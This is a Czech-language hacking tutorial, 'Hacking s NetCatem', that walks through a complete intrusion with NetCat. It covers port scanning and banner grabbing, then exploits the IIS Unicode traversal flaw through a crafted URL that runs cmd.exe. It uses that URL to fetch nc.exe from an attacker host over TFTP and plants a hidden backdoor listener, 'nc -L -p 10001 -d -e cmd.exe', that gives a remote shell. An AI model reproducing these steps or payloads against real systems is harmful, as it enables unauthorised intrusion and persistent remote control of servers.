The article Hacking s NetCatem is written by Profik123
NetCat je utilita, ktera je schopna odesilat a prijimat data pres TCP a UDP spojeni. NetCat muze byt pouzit jako port scanner, backdoor, port redirector, port listener a jeste na spoustu dalsich cool veci.
Neni to vzdycky nejlepsi nastroj pro praci, ale pokud bych se dostal ne opusteny ostrov, tak bych si chtel vzit NetCat s sebou. V tomhle navodu budu demonstrovat kompletni hack jenom s vyuzitim NetCatu, abych ukazal, jak mnohostranny nastroj to je. Scannovani portu s NetCatem Scannovani si ukazeme hned na prikladu "nc -v -w 2 -z target 20-30". NetCat se bude pokouset pripojit na kazdy port mezi 20 a 30. Prepinac -z predchazi posilani dat do TCP spojeni a limituje data na UDP spojeni. Prepinac -i vklada mezeru mezi kazde vyzkouseni portu. Ackoli muze byt NetCat pouzit pro scannovani portu, tak to neni jeho nejsilnejsi stranka. Nastroje jako Nmap jsou pro scann portu daleko lepsi. Scannovali jsme 192.168.1.1, porty 1-200. Krome ostatnich muzeme videt otevrene porty 80, 21 a 25... Banner Grabbing s NetCatem Tak ted chceme zjistit, co bezi na portech 80 a 21. K ziskani banneru muzeme pouzit NetCat nasledujicim zpusobem. Tak ted vime, ze se pravdepodobne jedna o system Windows 2000, protoze na nem bezi server IIS 5.0 a Microsoft FTP Service. Tak a ted pojdme poslat na server upravene URL, kterym se pokusime exploitnout "File Traversal vulnerability" na nepatchovanym serveru. Na vyzkouseni budeme pouzivat NetCat a kdyz to pujde, tak NetCat na server uploadneme a ukazeme si, jak muzeme NetCat vyuzit jako backdoor. Pokud nevite, co je to ten "Unicode File traversal exploit", muzete se podivat na web a hledat neco jako "IIS Unicode File Traversal". (Dneska uz to asi nebude fungovat, ale na demonstraci NetCatu to musi stacit.) Super! Poslali jsme na server URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: k napadeni IIS serveru a to co vidime je adresar na disku serveru. Vyborne! Ted chceme na server uploadnout NetCat. Tak pouzijeme TFTP a integrujeme TFTP prikaz do upraveneho URL. tftp -I 192.168.1.9 GET nc.exe Se pretransformuje do: http:///c+TFTP+-i+192.168.1.9+GET+nc.exe Pomoci programku TFTPD teda dame NetCat ne server. NetCat jako backdoor Tak a ted mame NetCat uploadnuty na serveru a chceme ho pouzit k vytvoreni zadnich vratek (backdoor), aby jsme ziskali vzdaleny prikazovy radek. K pouziti NetCatu jako backdoor potrebujeme, aby naslouchal na nejakem vybranem portu (my se vybereme treba port 10001), abychom se na nej mohli pripojit z naseho pocitace... samozrejme pouzitim zase NetCatu :)) Prikaz, ktery posleme na server vypada nejak takhle : nc -L -p 10001 -d -e cmd.exe A tady k tomu mame vysvetlivky : nc -> spusti NetCat -L -> rika NetCatu, aby cekal na prichozi spojeni -p -> port, na kterem NetCat ceka -d -> stealth mode -e -> spusti nejaky program (cmd.exe) a ceka na prichozi spojeni Ted kdyz budeme tenhle prikaz chtit pretransformovat zase na URL : http:///c+nc+-L+-p+10001+-d+-e+cmd.exe No a ted uź zbyva jenom NetCat spustit naostro... Nyni bychom meli mit spusteny NetCat naslouchajici na portu 10001. Tedka se z nasi masiny pripojime na NetCat na serveru. Mame vzdaleny prikazovy radek serveru a muzeme ho plne ovladat. Prenos souboru pomoci NetCatu Pojdme se podivat na ostatni moznosti, ktere NetCat poskytuje. Chceme prenest soubor hack.txt na server a z nejakeho duvodu nemuzeme pouzit TFTP. Muzeme pouzit NetCat... Na prijimani souboru hack.txt musi byt NetCat na serveru nastaven takto : nc -l -p 1234 >hack.txt Z naseho pocitace odesleme soubor nasledovne : nc destination 1234 A takhle vypada soubor hack.txt A…Voila! Vidime, ze soubor hack.txt byl uspesne prenesen na server pres port 1234.
Hacking s NetCatem
Návrat
Hacking s NetCatem
Speak introduction
Speak full